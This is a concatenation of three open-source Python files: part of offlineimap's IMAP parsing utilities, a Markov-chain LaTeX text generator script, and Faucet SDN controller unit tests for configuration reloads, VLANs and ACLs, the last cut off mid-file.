https://sourceforge.net/tracker/index.php?func=detail&aid=619732&group_id=5470&atid=105470 # One example is: # result[0] = '() "\\\\" Admin' # result[1] = ('() "\\\\" {19}', 'Folder\\2') # # This function will effectively get result[0] or result[1], so # if we get the result[1] version, we need to parse apart the tuple # and figure out what to do with it. Each even-numbered # part of it should end with the {} number, and each odd-numbered # part should be directly a part of the result. We'll # artificially quote it to help out. retval = [] for i in range(len(imapstring)): if i % 2: # Odd: quote then append. 
arg = imapstring[i] # Quote code lifted from imaplib arg = arg.replace('\\', '\\\\') arg = arg.replace('"', '\\"') arg = '"%s"' % arg debug("imapsplit() non-string [%d]: Appending %s" %\ (i, arg)) retval.append(arg) else: # Even -- we have a string that ends with a literal # size specifier. We need to strip off that, then run # what remains through the regular imapsplit parser. # Recursion to the rescue. arg = imapstring[i] arg = re.sub('\{\d+\}$', '', arg) debug("imapsplit() non-string [%d]: Feeding %s to recursion" %\ (i, arg)) retval.extend(imapsplit(arg)) debug("imapsplit() non-string: returning %s" % str(retval)) return retval workstr = imapstring.strip() retval = [] while len(workstr): if workstr[0] == '(': rparenc = 1 # count of right parenthesis to match rpareni = 1 # position to examine while rparenc: # Find the end of the group. if workstr[rpareni] == ')': # end of a group rparenc -= 1 elif workstr[rpareni] == '(': # start of a group rparenc += 1 rpareni += 1 # Move to next character. parenlist = workstr[0:rpareni] workstr = workstr[rpareni:].lstrip() retval.append(parenlist) elif workstr[0] == '"': quotelist = quotere.search(workstr).group(1) workstr = workstr[len(quotelist):].lstrip() retval.append(quotelist) else: splits = string.split(workstr, maxsplit = 1) splitslen = len(splits) # The unquoted word is splits[0]; the remainder is splits[1] if splitslen == 2: # There's an unquoted word, and more string follows. retval.append(splits[0]) workstr = splits[1] # split will have already lstripped it continue elif splitslen == 1: # We got a last unquoted word, but nothing else retval.append(splits[0]) # Nothing remains. workstr would be '' break elif splitslen == 0: # There was not even an unquoted word. break return retval flagmap = [('\\Seen', 'S'), ('\\Answered', 'R'), ('\\Flagged', 'F'), ('\\Deleted', 'T'), ('\\Draft', 'D')] def flagsimap2maildir(flagstring): """Convert string '(\\Draft \\Deleted)' into a flags set(DR)""" retval = set() imapflaglist = flagstring[1:-1].split() for imapflag, maildirflag in flagmap: if imapflag in imapflaglist: retval.add(maildirflag) return retval def flagsmaildir2imap(maildirflaglist): """Convert set of flags ([DR]) into a string '(\\Draft \\Deleted)'""" retval = [] for imapflag, maildirflag in flagmap: if maildirflag in maildirflaglist: retval.append(imapflag) retval.sort() return '(' + ' '.join(retval) + ')' def uid_sequence(uidlist): """Collapse UID lists into shorter sequence sets [1,2,3,4,5,10,12,13] will return "1:5,10,12:13". This function sorts the list, and only collapses if subsequent entries form a range. :returns: The collapsed UID list as string""" def getrange(start, end): if start == end: return(str(start)) return "%s:%s" % (start, end) if not len(uidlist): return '' # Empty list, return start, end = None, None retval = [] # Force items to be longs and sort them sorted_uids = sorted(map(int, uidlist)) for item in iter(sorted_uids): item = int(item) if start == None: # First item start, end = item, item elif item == end + 1: # Next item in a range end = item else: # Starting a new range retval.append(getrange(start, end)) start, end = item, item retval.append(getrange(start, end)) # Add final range/item return ",".join(retval)
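# --- Illustrative sketch (not part of the original module) ---
# Expected behaviour of some of the helpers above, taken from their docstrings
# and the flagmap table:
#
#   uid_sequence([1, 2, 3, 4, 5, 10, 12, 13])  -> '1:5,10,12:13'
#   flagsimap2maildir('(\\Seen \\Deleted)')    -> set(['S', 'T'])
#   flagsmaildir2imap(set(['S', 'T']))         -> '(\\Deleted \\Seen)'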
rayners/offlineimap
offlineimap/imaputil.py
Python
gpl-2.0
8,280
#!/usr/bin/env python

from markovLatex.markov import TextGenerator
from markovLatex.tex import Document as doc
from random import randint
import argparse, sys


def main(args):

    parser = argparse.ArgumentParser(description="Access the Will of the Gods from the command line.")
    parser.add_argument('files', type=str, nargs='+', help='one or more input text files')
    parser.add_argument('-c','--chapters', type=int, help='The number of chapters in the output text')
    args = parser.parse_args(args)

    corpus = []
    for arg in args.files:
        try:
            corpus.append(open(arg, 'r'))
        except Exception as e:
            print(e)

    if corpus:
        try:
            d = doc(r'../output/output.tex')
            textGen = TextGenerator(corpus)
            title = textGen.title()
            print('\nBEHOLD:\n\n')
            print('THE GODS HAVE SMILED UPON US THIS DAY\n\n')
            print('THEY PASS ON TO YOU THIS HOLY TEXT:\n\n')
            print(title + '\n\n')
            print('SPREAD ITS MIGHTY WORD THROUGHOUT THE LAND')
            d.begin(title)
            for i in range(0, args.chapters or randint(10,20)):
                d.write_chapter(textGen.title(),textGen.chapter())
            d.compile()
        except Exception as e:
            print(e)
            return 1

    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))
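# --- Illustrative usage sketch (not part of the original script) ---
# Run from the command line with one or more corpus files; the file names and
# chapter count below are placeholders.
#
#   python biblegen.py corpus/genesis.txt corpus/moby_dick.txt -c 12
#
# This writes a 12-chapter Markov-generated document to ../output/output.tex
# and compiles it.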
SeanMcGrath/MarkovLatex
biblegen.py
Python
mit
1,204
#!/usr/bin/env python3 """Unit tests run as PYTHONPATH=../../.. python3 ./test_valve.py.""" # pylint: disable=too-many-lines # Copyright (C) 2015 Research and Innovation Advanced Network New Zealand Ltd. # Copyright (C) 2015--2019 The Contributors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from functools import partial import copy import hashlib import unittest import time from os_ken.ofproto import ofproto_v1_3 as ofp from faucet import config_parser_util from faucet import valve_of from clib.fakeoftable import CONTROLLER_PORT from clib.valve_test_lib import BASE_DP1_CONFIG, CONFIG, DP1_CONFIG, FAUCET_MAC, ValveTestBases class ValveIncludeTestCase(ValveTestBases.ValveTestNetwork): """Test include optional files.""" CONFIG = """ include-optional: ['/does/not/exist/'] dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % DP1_CONFIG def setUp(self): """Setup config with non-existent optional include file""" self.setup_valves(self.CONFIG) def test_include_optional(self): """Test include optional files.""" self.assertEqual(1, int(self.get_prom('dp_status'))) class ValveBadConfTestCase(ValveTestBases.ValveTestNetwork): """Test recovery from a bad config file.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x100 """ % DP1_CONFIG BAD_CONFIG = """ dps: {} """ def setUp(self): """Setup invalid config""" self.setup_valves(self.CONFIG) def test_bad_conf(self): """Test various config types & config reloading""" for config, load_error in ( (self.CONFIG, 0), (self.BAD_CONFIG, 1), (self.CONFIG, 0), (self.MORE_CONFIG, 0), (self.BAD_CONFIG, 1), (self.CONFIG, 0)): with open(self.config_file, 'w', encoding='utf-8') as config_file: config_file.write(config) self.valves_manager.request_reload_configs(self.mock_time(), self.config_file) self.assertEqual( load_error, self.get_prom('faucet_config_load_error', bare=True), msg='%u: %s' % (load_error, config)) class ValveChangePortTestCase(ValveTestBases.ValveTestNetwork): """Test changes to config on ports.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x200 permanent_learn: True """ % DP1_CONFIG LESS_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x200 permanent_learn: False """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_delete_permanent_learn(self): """Test port permanent learn can deconfigured.""" table = self.network.tables[self.DP_ID] before_table_state = table.table_state() self.rcv_packet(2, 0x200, { 'eth_src': self.P2_V200_MAC, 'eth_dst': self.P3_V200_MAC, 'ipv4_src': '10.0.0.2', 'ipv4_dst': '10.0.0.3', 'vid': 0x200}) self.update_and_revert_config( self.CONFIG, self.LESS_CONFIG, 'warm', before_table_states={self.DP_ID: before_table_state}) class ValveDeletePortTestCase(ValveTestBases.ValveTestNetwork): """Test deletion of a port.""" CONFIG = """ dps: 
s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 tagged_vlans: [0x100] """ % DP1_CONFIG LESS_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_port_delete(self): """Test port can be deleted.""" self.update_and_revert_config(self.CONFIG, self.LESS_CONFIG, 'cold') class ValveAddPortMirrorNoDelVLANTestCase(ValveTestBases.ValveTestNetwork): """Test addition of port mirroring does not cause a del VLAN.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 output_only: true """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 output_only: true mirror: [1] """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" _ = self.setup_valves(self.CONFIG)[self.DP_ID] def test_port_mirror(self): """Test addition of port mirroring is a warm start.""" _ = self.update_config(self.MORE_CONFIG, reload_type='warm')[self.DP_ID] class ValveAddPortTestCase(ValveTestBases.ValveTestNetwork): """Test addition of a port.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 tagged_vlans: [0x100] """ % DP1_CONFIG @staticmethod def _inport_flows(in_port, ofmsgs): return [ ofmsg for ofmsg in ValveTestBases.flowmods_from_flows(ofmsgs) if ofmsg.match.get('in_port') == in_port] def setUp(self): """Setup basic port and vlan config""" initial_ofmsgs = self.setup_valves(self.CONFIG)[self.DP_ID] self.assertFalse(self._inport_flows(3, initial_ofmsgs)) def test_port_add(self): """Test port can be added.""" reload_ofmsgs = self.update_config(self.MORE_CONFIG, reload_type='cold')[self.DP_ID] self.assertTrue(self._inport_flows(3, reload_ofmsgs)) class ValveAddPortTrafficTestCase(ValveTestBases.ValveTestNetwork): """Test addition of a port with traffic.""" # NOTE: This needs to use 'Generic' hardware, # as GenericTFM does not support 'warm' start REQUIRE_TFM = False CONFIG = """ dps: s1: dp_id: 1 hardware: Generic interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] """ MORE_CONFIG = """ dps: s1: dp_id: 1 hardware: Generic interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 tagged_vlans: [0x100] """ @staticmethod def _inport_flows(in_port, ofmsgs): return [ ofmsg for ofmsg in ValveTestBases.flowmods_from_flows(ofmsgs) if ofmsg.match.get('in_port') == in_port] def _learn(self, in_port): ucast_pkt = self.pkt_match(in_port, 1) ucast_pkt['in_port'] = in_port ucast_pkt['vlan_vid'] = self.V100 table = self.network.tables[self.DP_ID] self.assertTrue(table.is_output(ucast_pkt, port=CONTROLLER_PORT)) self.rcv_packet(in_port, self.V100, ucast_pkt) def _unicast_between(self, in_port, out_port, not_out=1): ucast_match = self.pkt_match(in_port, out_port) ucast_match['in_port'] = in_port ucast_match['vlan_vid'] = self.V100 table = self.network.tables[self.DP_ID] self.assertTrue(table.is_output(ucast_match, port=out_port)) self.assertFalse(table.is_output(ucast_match, port=not_out)) def setUp(self): initial_ofmsgs = self.setup_valves(self.CONFIG)[self.DP_ID] 
self.assertFalse(self._inport_flows(3, initial_ofmsgs)) def test_port_add_no_ofmsgs(self): """New config does not generate new flows.""" update_ofmsgs = self.update_config(self.MORE_CONFIG, reload_type='warm')[self.DP_ID] self.assertFalse(self._inport_flows(3, update_ofmsgs)) def test_port_add_link_state(self): """New port can be added in link-down state.""" self.update_config(self.MORE_CONFIG, reload_type='warm') self.add_port(3, link_up=False) self.port_expected_status(3, 0) self.set_port_link_up(3) self.port_expected_status(3, 1) def test_port_add_traffic(self): """New port can be added, and pass traffic.""" self.update_config(self.MORE_CONFIG, reload_type='warm') self.add_port(3) self._learn(2) self._learn(3) self._unicast_between(2, 3) self._unicast_between(3, 2) class ValveWarmStartVLANTestCase(ValveTestBases.ValveTestNetwork): """Test change of port VLAN only is a warm start.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 9 tagged_vlans: [0x100] p2: number: 11 tagged_vlans: [0x100] p3: number: 13 tagged_vlans: [0x100] p4: number: 14 native_vlan: 0x200 """ % DP1_CONFIG WARM_CONFIG = """ dps: s1: %s interfaces: p1: number: 9 tagged_vlans: [0x100] p2: number: 11 tagged_vlans: [0x100] p3: number: 13 tagged_vlans: [0x100] p4: number: 14 native_vlan: 0x300 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_warm_start(self): """Test VLAN change is warm startable and metrics maintained.""" self.update_and_revert_config(self.CONFIG, self.WARM_CONFIG, 'warm') self.rcv_packet(9, 0x100, { 'eth_src': self.P1_V100_MAC, 'eth_dst': self.UNKNOWN_MAC, 'ipv4_src': '10.0.0.1', 'ipv4_dst': '10.0.0.2'}) vlan_labels = {'vlan': str(int(0x100))} port_labels = {'port': 'p1', 'port_description': 'p1'} port_labels.update(vlan_labels) def verify_func(): self.assertEqual( 1, self.get_prom('vlan_hosts_learned', labels=vlan_labels)) self.assertEqual( 1, self.get_prom('port_vlan_hosts_learned', labels=port_labels)) verify_func() self.update_config(self.WARM_CONFIG, reload_type='warm') verify_func() class ValveDeleteVLANTestCase(ValveTestBases.ValveTestNetwork): """Test deleting VLAN.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100, 0x200] p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG LESS_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x200] p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_delete_vlan(self): """Test VLAN can be deleted.""" self.update_and_revert_config(self.CONFIG, self.LESS_CONFIG, 'cold') class ValveChangeDPTestCase(ValveTestBases.ValveTestNetwork): """Test changing DP.""" CONFIG = """ dps: s1: %s priority_offset: 4321 interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x100 """ % DP1_CONFIG NEW_CONFIG = """ dps: s1: %s priority_offset: 1234 interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x100 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config with priority offset""" self.setup_valves(self.CONFIG) def test_change_dp(self): """Test DP changed.""" self.update_and_revert_config(self.CONFIG, self.NEW_CONFIG, 'cold') class ValveAddVLANTestCase(ValveTestBases.ValveTestNetwork): """Test adding VLAN.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100, 0x200] p2: number: 2 tagged_vlans: [0x100] """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100, 0x200] p2: number: 2 
tagged_vlans: [0x100, 0x300] """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_add_vlan(self): """Test VLAN can added.""" self.update_and_revert_config(self.CONFIG, self.MORE_CONFIG, 'cold') class ValveChangeACLTestCase(ValveTestBases.ValveTestNetwork): """Test changes to ACL on a port.""" CONFIG = """ acls: acl_same_a: - rule: actions: allow: 1 acl_same_b: - rule: actions: allow: 1 acl_diff_c: - rule: actions: allow: 0 dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 acl_in: acl_same_a p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG SAME_CONTENT_CONFIG = """ acls: acl_same_a: - rule: actions: allow: 1 acl_same_b: - rule: actions: allow: 1 acl_diff_c: - rule: actions: allow: 0 dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 acl_in: acl_same_b p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG DIFF_CONTENT_CONFIG = """ acls: acl_same_a: - rule: actions: allow: 1 acl_same_b: - rule: actions: allow: 1 acl_diff_c: - rule: actions: allow: 0 dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 acl_in: acl_diff_c p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG def setUp(self): """Setup basic ACL config""" self.setup_valves(self.CONFIG) def test_change_port_acl(self): """Test port ACL can be changed.""" self.update_and_revert_config(self.CONFIG, self.SAME_CONTENT_CONFIG, 'warm') self.update_config(self.SAME_CONTENT_CONFIG, reload_type='warm') self.rcv_packet(1, 0x100, { 'eth_src': self.P1_V100_MAC, 'eth_dst': self.UNKNOWN_MAC, 'ipv4_src': '10.0.0.1', 'ipv4_dst': '10.0.0.2'}) vlan_labels = {'vlan': str(int(0x100))} port_labels = {'port': 'p1', 'port_description': 'p1'} port_labels.update(vlan_labels) def verify_func(): self.assertEqual( 1, self.get_prom('vlan_hosts_learned', labels=vlan_labels)) self.assertEqual( 1, self.get_prom('port_vlan_hosts_learned', labels=port_labels)) verify_func() # ACL changed but we kept the learn cache. self.update_config(self.DIFF_CONTENT_CONFIG, reload_type='warm') verify_func() class ValveChangeMirrorTestCase(ValveTestBases.ValveTestNetwork): """Test changes mirroring port.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 output_only: True p3: number: 3 native_vlan: 0x200 """ % DP1_CONFIG MIRROR_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 mirror: p1 p3: number: 3 native_vlan: 0x200 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_change_port_acl(self): """Test port ACL can be changed.""" self.update_and_revert_config(self.CONFIG, self.MIRROR_CONFIG, reload_type='warm') vlan_labels = {'vlan': str(int(0x100))} port_labels = {'port': 'p1', 'port_description': 'p1'} port_labels.update(vlan_labels) def verify_prom(): self.assertEqual( 1, self.get_prom('vlan_hosts_learned', labels=vlan_labels)) self.assertEqual( 1, self.get_prom('port_vlan_hosts_learned', labels=port_labels)) self.rcv_packet(1, 0x100, { 'eth_src': self.P1_V100_MAC, 'eth_dst': self.UNKNOWN_MAC, 'ipv4_src': '10.0.0.1', 'ipv4_dst': '10.0.0.2'}) verify_prom() # Now mirroring port 1 but we kept the cache. self.update_config(self.MIRROR_CONFIG, reload_type='warm') verify_prom() # Now unmirror again. 
self.update_config(self.CONFIG, reload_type='warm') verify_prom() class ValveACLTestCase(ValveTestBases.ValveTestNetwork): """Test ACL drop/allow and reloading.""" def setUp(self): self.setup_valves(CONFIG) def test_vlan_acl_deny(self): """Test VLAN ACL denies a packet.""" acl_config = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: v100 p2: number: 2 native_vlan: v200 tagged_vlans: [v100] p3: number: 3 tagged_vlans: [v100, v200] p4: number: 4 tagged_vlans: [v200] p5: number: 5 native_vlan: v300 vlans: v100: vid: 0x100 v200: vid: 0x200 acl_in: drop_non_ospf_ipv4 v300: vid: 0x300 acls: drop_non_ospf_ipv4: - rule: nw_dst: '224.0.0.5' dl_type: 0x800 actions: allow: 1 - rule: dl_type: 0x800 actions: allow: 0 """ % DP1_CONFIG drop_match = { 'in_port': 2, 'vlan_vid': 0, 'eth_type': 0x800, 'ipv4_dst': '192.0.2.1'} accept_match = { 'in_port': 2, 'vlan_vid': 0, 'eth_type': 0x800, 'ipv4_dst': '224.0.0.5'} table = self.network.tables[self.DP_ID] # base case for match in (drop_match, accept_match): self.assertTrue( table.is_output(match, port=3, vid=self.V200), msg='Packet not output before adding ACL') def verify_func(): self.flap_port(2) self.assertFalse( table.is_output(drop_match), msg='Packet not blocked by ACL') self.assertTrue( table.is_output(accept_match, port=3, vid=self.V200), msg='Packet not allowed by ACL') self.update_and_revert_config( CONFIG, acl_config, reload_type='cold', verify_func=verify_func) class ValveEgressACLTestCase(ValveTestBases.ValveTestNetwork): """Test ACL drop/allow and reloading.""" def setUp(self): self.setup_valves(CONFIG) def test_vlan_acl_deny(self): """Test VLAN ACL denies a packet.""" allow_host_v6 = 'fc00:200::1:1' deny_host_v6 = 'fc00:200::1:2' faucet_v100_vip = 'fc00:100::1' faucet_v200_vip = 'fc00:200::1' acl_config = """ dps: s1: {dp1_config} interfaces: p1: number: 1 native_vlan: v100 p2: number: 2 native_vlan: v200 tagged_vlans: [v100] p3: number: 3 tagged_vlans: [v100, v200] p4: number: 4 tagged_vlans: [v200] vlans: v100: vid: 0x100 faucet_mac: '{mac}' faucet_vips: ['{v100_vip}/64'] v200: vid: 0x200 faucet_mac: '{mac}' faucet_vips: ['{v200_vip}/64'] acl_out: drop_non_allow_host_v6 minimum_ip_size_check: false routers: r_v100_v200: vlans: [v100, v200] acls: drop_non_allow_host_v6: - rule: ipv6_dst: '{allow_host}' eth_type: 0x86DD actions: allow: 1 - rule: eth_type: 0x86DD actions: allow: 0 """.format(dp1_config=DP1_CONFIG, mac=FAUCET_MAC, v100_vip=faucet_v100_vip, v200_vip=faucet_v200_vip, allow_host=allow_host_v6) l2_drop_match = { 'in_port': 2, 'eth_dst': self.P3_V200_MAC, 'vlan_vid': 0, 'eth_type': 0x86DD, 'ipv6_dst': deny_host_v6} l2_accept_match = { 'in_port': 3, 'eth_dst': self.P2_V200_MAC, 'vlan_vid': 0x200 | ofp.OFPVID_PRESENT, 'eth_type': 0x86DD, 'ipv6_dst': allow_host_v6} v100_accept_match = {'in_port': 1, 'vlan_vid': 0} table = self.network.tables[self.DP_ID] # base case for match in (l2_drop_match, l2_accept_match): self.assertTrue( table.is_output(match, port=4), msg='Packet not output before adding ACL') def verify_func(): self.assertTrue( table.is_output(v100_accept_match, port=3), msg='Packet not output when on vlan with no ACL') self.assertFalse( table.is_output(l2_drop_match, port=3), msg='Packet not blocked by ACL') self.assertTrue( table.is_output(l2_accept_match, port=2), msg='Packet not allowed by ACL') # unicast self.rcv_packet(2, 0x200, { 'eth_src': self.P2_V200_MAC, 'eth_dst': self.P3_V200_MAC, 'vid': 0x200, 'ipv6_src': allow_host_v6, 'ipv6_dst': deny_host_v6, 'neighbor_advert_ip': allow_host_v6}) self.rcv_packet(3, 0x200, 
{ 'eth_src': self.P3_V200_MAC, 'eth_dst': self.P2_V200_MAC, 'vid': 0x200, 'ipv6_src': deny_host_v6, 'ipv6_dst': allow_host_v6, 'neighbor_advert_ip': deny_host_v6}) self.assertTrue( table.is_output(l2_accept_match, port=2), msg='Packet not allowed by ACL') self.assertFalse( table.is_output(l2_drop_match, port=3), msg='Packet not blocked by ACL') # l3 l3_drop_match = { 'in_port': 1, 'eth_dst': FAUCET_MAC, 'vlan_vid': 0, 'eth_type': 0x86DD, 'ipv6_dst': deny_host_v6} l3_accept_match = { 'in_port': 1, 'eth_dst': FAUCET_MAC, 'vlan_vid': 0, 'eth_type': 0x86DD, 'ipv6_dst': allow_host_v6} self.assertTrue( table.is_output(l3_accept_match, port=2), msg='Routed packet not allowed by ACL') self.assertFalse( table.is_output(l3_drop_match, port=3), msg='Routed packet not blocked by ACL') # multicast self.update_and_revert_config(CONFIG, acl_config, 'cold', verify_func=verify_func) class ValveReloadConfigProfile(ValveTestBases.ValveTestNetwork): """Test reload processing time.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % BASE_DP1_CONFIG NUM_PORTS = 100 baseline_total_tt = None def setUp(self): """Setup basic port and vlan config""" self.setup_valves(CONFIG) def test_profile_reload(self): """Test reload processing time.""" orig_config = copy.copy(self.CONFIG) def load_orig_config(): pstats_out, _ = self.profile( partial(self.update_config, orig_config)) self.baseline_total_tt = pstats_out.total_tt # pytype: disable=attribute-error for i in range(2, 100): self.CONFIG += """ p%u: number: %u native_vlan: 0x100 """ % (i, i) for i in range(5): load_orig_config() pstats_out, pstats_text = self.profile( partial(self.update_config, self.CONFIG, reload_type='cold')) cache_info = valve_of.output_non_output_actions.cache_info() self.assertGreater(cache_info.hits, cache_info.misses, msg=cache_info) total_tt_prop = ( pstats_out.total_tt / self.baseline_total_tt) # pytype: disable=attribute-error # must not be 20x slower, to ingest config for 100 interfaces than 1. # TODO: This test might have to be run separately, # since it is marginal on GitHub actions due to parallel test runs. 
if total_tt_prop < 20: for valve in self.valves_manager.valves.values(): for table in valve.dp.tables.values(): cache_info = table._trim_inst.cache_info() # pylint: disable=protected-access self.assertGreater(cache_info.hits, cache_info.misses, msg=cache_info) return time.sleep(i) self.fail('%f: %s' % (total_tt_prop, pstats_text)) class ValveTestVLANRef(ValveTestBases.ValveTestNetwork): """Test reference to same VLAN by name or VID.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 333 p2: number: 2 native_vlan: threes vlans: threes: vid: 333 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_vlan_refs(self): """Test same VLAN is referred to.""" vlans = self.valves_manager.valves[self.DP_ID].dp.vlans self.assertEqual(1, len(vlans)) self.assertEqual('threes', vlans[333].name, vlans[333]) self.assertEqual(2, len(vlans[333].untagged)) class ValveTestConfigHash(ValveTestBases.ValveTestNetwork): """Verify faucet_config_hash_info update after config change""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def _get_info(self, metric, name): """"Return (single) info dict for metric""" # There doesn't seem to be a nice API for this, # so we use the prometheus client internal API metrics = list(metric.collect()) self.assertEqual(len(metrics), 1) samples = metrics[0].samples self.assertEqual(len(samples), 1) sample = samples[0] self.assertEqual(sample.name, name) return sample.labels def _check_hashes(self): """Verify and return faucet_config_hash_info labels""" labels = self._get_info(metric=self.metrics.faucet_config_hash, name='faucet_config_hash_info') files = labels['config_files'].split(',') hashes = labels['hashes'].split(',') self.assertTrue(len(files) == len(hashes) == 1) self.assertEqual(files[0], self.config_file, 'wrong config file') hash_value = config_parser_util.config_file_hash(self.config_file) self.assertEqual(hashes[0], hash_value, 'hash validation failed') return labels def _change_config(self): """Change self.CONFIG""" if '0x100' in self.CONFIG: self.CONFIG = self.CONFIG.replace('0x100', '0x200') else: self.CONFIG = self.CONFIG.replace('0x200', '0x100') self.update_config(self.CONFIG, reload_expected=True) return self.CONFIG def test_config_hash_func(self): """Verify that faucet_config_hash_func is set correctly""" labels = self._get_info(metric=self.metrics.faucet_config_hash_func, name='faucet_config_hash_func') hash_funcs = list(labels.values()) self.assertEqual(len(hash_funcs), 1, "found multiple hash functions") hash_func = hash_funcs[0] # Make sure that it matches and is supported in hashlib self.assertEqual(hash_func, config_parser_util.CONFIG_HASH_FUNC) self.assertTrue(hash_func in hashlib.algorithms_guaranteed) def test_config_hash_update(self): """Verify faucet_config_hash_info is properly updated after config""" # Verify that hashes change after config is changed old_config = self.CONFIG old_hashes = self._check_hashes() starting_hashes = old_hashes self._change_config() new_config = self.CONFIG self.assertNotEqual(old_config, new_config, 'config not changed') new_hashes = self._check_hashes() self.assertNotEqual(old_hashes, new_hashes, 'hashes not changed after config change') # Verify that hashes don't change after config isn't changed old_hashes = new_hashes self.update_config(self.CONFIG, reload_expected=False) new_hashes = self._check_hashes() 
self.assertEqual(old_hashes, new_hashes, "hashes changed when config didn't") # Verify that hash is restored when config is restored self._change_config() new_hashes = self._check_hashes() self.assertEqual(new_hashes, starting_hashes, 'hashes should be restored to starting values') class ValveTestConfigRevert(ValveTestBases.ValveTestNetwork): """Test configuration revert""" CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: number: 1 native_vlan: 0x100 """ CONFIG_AUTO_REVERT = True def setUp(self): """Setup basic port and vlan config with hardware type set""" self.setup_valves(self.CONFIG) def test_config_revert(self): """Verify config is automatically reverted if bad.""" self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 0) self.update_config('***broken***', reload_expected=True, error_expected=1) self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 1) with open(self.config_file, 'r', encoding='utf-8') as config_file: config_content = config_file.read() self.assertEqual(self.CONFIG, config_content) self.update_config(self.CONFIG + '\n', reload_expected=False, error_expected=0) more_config = self.CONFIG + """ p2: number: 2 native_vlan: 0x100 """ self.update_config(more_config, reload_expected=True, reload_type='warm', error_expected=0) class ValveTestConfigRevertBootstrap(ValveTestBases.ValveTestNetwork): """Test configuration auto reverted if bad""" BAD_CONFIG = """ *** busted *** """ GOOD_CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: number: 1 native_vlan: 0x100 """ CONFIG_AUTO_REVERT = True def setUp(self): """Setup invalid config""" self.setup_valves(self.BAD_CONFIG, error_expected=1) def test_config_revert(self): """Verify config is automatically reverted if bad.""" self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 1) self.update_config(self.GOOD_CONFIG + '\n', reload_expected=False, error_expected=0) self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 0) class ValveTestConfigApplied(ValveTestBases.ValveTestNetwork): """Test cases for faucet_config_applied.""" CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: description: "one thing" number: 1 native_vlan: 0x100 """ NEW_DESCR_CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: description: "another thing" number: 1 